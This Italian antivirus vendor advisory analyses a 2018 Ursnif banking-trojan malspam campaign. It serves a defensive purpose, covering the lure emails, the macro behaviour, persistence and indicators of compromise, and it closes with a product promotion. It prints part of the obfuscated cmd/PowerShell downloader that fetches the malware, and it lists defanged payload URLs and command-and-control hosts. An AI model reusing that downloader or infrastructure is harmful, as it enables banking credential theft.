Continua attacco campagna di malspam che distribuiscono il malware Ursnif del 20 marzo 2018

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft della campagna di mail che diffonde il malware Ursnif in data 20 marzo 2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE

==> Campagna invio Ursnif

==> Come cercare di riconoscere una falsa mail

==> Come inviare mail sospette

==> Integra la protezione con Vir.IT Lite

==> Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer..

Campagna malware "Ursnif"

Famiglia malware: Ursnif
VirIT: Trojan.Win32.Ursnif.ET, Trojan.DOC.Dropper.OV, W97M.Downloader.DU

Descrizione:
La campagna di mail è partita questa mattina 20 marzo 2018.

Oggetto: [cambia in base alla mail che si riceve]

Buongiorno,

Vedi allegato e di confermare.

Come si diffonde:

Sfrutta gli account di posta elettronica configurati nel pc infettato, inviando finte risposte infette, a dei messaggi che sono stati GIA RICEVUTI in precedenza dalla vittima stessa.
Il corpo del messaggio è sempre lo stesso (visibile qui sopra in rosso), invece l'oggetto è diverso proprio perchè rispondendo a dei messaggi che la vittima ha ricevuto, nei giorni precedenti, varia in base ad essi.
In allegato si trova un file DOC con nome "Richiesta.DOC" oppure termina con "-Richiesta.Doc" (esempio "info-Richiesta.doc").
L'allegato malevole presente nella mail è un file DOC che al suo interno contiene una MACRO AutoOpen che appena viene avviata scarica il malware e lo mette in esecuzione.

La macro AutoOpen prima esegue il file CMD.EXE passandogli come parametro la seguente stringa per eseguire PowerShell (campagna del 2018-03-20):

bjqVWvLV QnTWflfVsJojREFKUjiw nkCtiAvGwuozow & %^C^o^m^S^p^E^c^%
%^C^o^m^S^p^E^c^% /V /c
set %AjpWflGjmopTHFW%=uWfXwUcHhFpDf&&set %ZjoTtBfulCziS%=p&&
set %nzIdmRsRVXh%=o^w&&set %uwlNdsjVYvaRElO%=mjZqKjiZbNfEh&&
set %swXbCoHjVVRkJQ%=!%ZjoTtBfulCziS%!&&
set %pZvDDsqEGdMmWVb%=GtjNSvW&&set %YwzRKUfadQV%=e^r&&
set %hCfcSRbVDET%=!%nzIdmRsRVXh%!&&set %pfkWvEm%=s&&
set %QMUOTLlQNinjWiN%=tYkjGMD&&set %OuRzmiCNwI%=he&&
set %RlNcjvTsc%=ll&&!%swXbCoHjVVRkJQ%!!%hCfcSRbVDET%!!
%YwzRKUfadQV%!!%pfkWvEm%!!%OuRzmiCNwI%!!%RlNcjvTsc%!
"InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::
([runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE
[..]
ADUAZQA0ADMAOAAwADEAOAAwADUANQBiAGEANwA5ADYAZgBjAGEANAA4AGEAZQA
5ADIAYQBhADUAMQBkAGEAZgA5ADMAZABmADIANwBmAA=='|
conVerTto-SECURestriNG -keY (22..37)) ) )))

Il cmd.exe manda in esecuzione uno script di Powershell:
powershell "InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::([ runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE( [rUNTiMe.InTeropservicES.MArShal]:: [..]

Lo script di PowerShell fa il download dell'Ursnif dal sito http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class nella cartella C:\Users\Public\<numeri>.exe (esempio C:\Users\Public\241520.exe).

IIl malware viene eseguito per copiarsi in una sottocartella casuale di %USERPROFILE%\APPDATA\ROAMING\MICROSOFT e mettersi in esecuzione automatica, crea una chiave in:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.

Il malware Ursnif fa un injection nel process EXPLORER.EXE

Esempio:
Nome: BITSTLIB.EXE
MD5: 3A20CFEFA9EF2EEB8E0BC48F2016587F3
Dimensione: 772.608 byte
Data di compilazione: 15/01/2015 00.58.27

Una seconda variante di macro, invece scarica il Trojan Banker Ursnif dal sito http://dqwodnqwdoajndwqdqwdasd[.]com.

Note:

Il malware che viene scaricato fa parte della famiglia degli Ursnif, le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta, ftp etc.

IOC 2018-03-20 (aggiornamento ore 15:50):

File DOC MD5:
022237484700FED95B425E47C8E65894
28854137C4FA3FF73C36F867F759AB1E
37408744E477E08D9EC4C10F8A9671BD
43C103C0DF16656972E80993172D82D3
445C2BBB192009359B549435AFAF72BA
4491A44BAA33CB8D102A7704D469C79C
4ED22727791E7A7593F6091D54F0B6AB
683C235F7D1CBF548F863B84DC0C67E9
6F784EEDE13B9FDA61DF3E461DACE867
72E69B0BBD5FB4D0D83A7FE4FE8F1234
7B10F167C070654C5D62C501F805CEB2
8B330F4F54CE6B4272C6AEA681D84D1E
A51F64C001A2AA500C9AA174FBB3DEF4
B4B4EEF90D29EEB9CCB14BEF0041ABCD
BBA69D7143B32A4F28D8E55240068009
BD73D4E8BC206E7FA68C658264F82629
C606FC84BF6869ABD31727D9C4B8F299
E0E6AD82EA08C023CE88CD3B4E34141A
EB28EB488F842DAD6F6B96142367F709

File EXE MD5:
14AA6A6F472C9BDA6D7A863CB8ADF842
2DB06886393216B0774BE6757AE1B431
3A20CFEFA9EF2EEB8E0BC48F2016587F
B9E96DC35FBAC25E2A5B958401B09088

URL:
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter2.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter3.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter4.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter5.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter6.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter7.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter8.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter9.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147

http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter1.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter2.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter3.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter4.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter5.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter6.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter7.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter8.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter9.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147

http://horse-technology[.]com/files/alex.bmp
http://lnx.eridanoweb[.]com/gestioni/header.png
http://playmuseek[.]com/wp-admin/maint/admin.rar
http://fioritononi[.]it/modules/readme.doc
http://voloweb[.]net/assistenze/img/wp-32.png
http://cmxsrl[.]it/wp-32.zip
http://onliva[.]at/jvassets/rk/docs.zip

Server C&C (dove vengono inviati i dati esfiltrati come password e clipboard log):
https://ijguiqjwhnschbashiwbad[.]net
https://xcnbjasjwehqiuzxc[.]com
http://onliva[.]at
http://fortares[.]su
http://swoqup[.]at

IP server C&C:
47.74.247.229

Torna ad inizio pagina

Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker, il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.

Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:

qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliento come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possiible/probabile phishing; possibile/probabile malware o altro).

Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.

Torna ad inizio pagina

Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:

liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
Procedi al download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.

C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina

Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”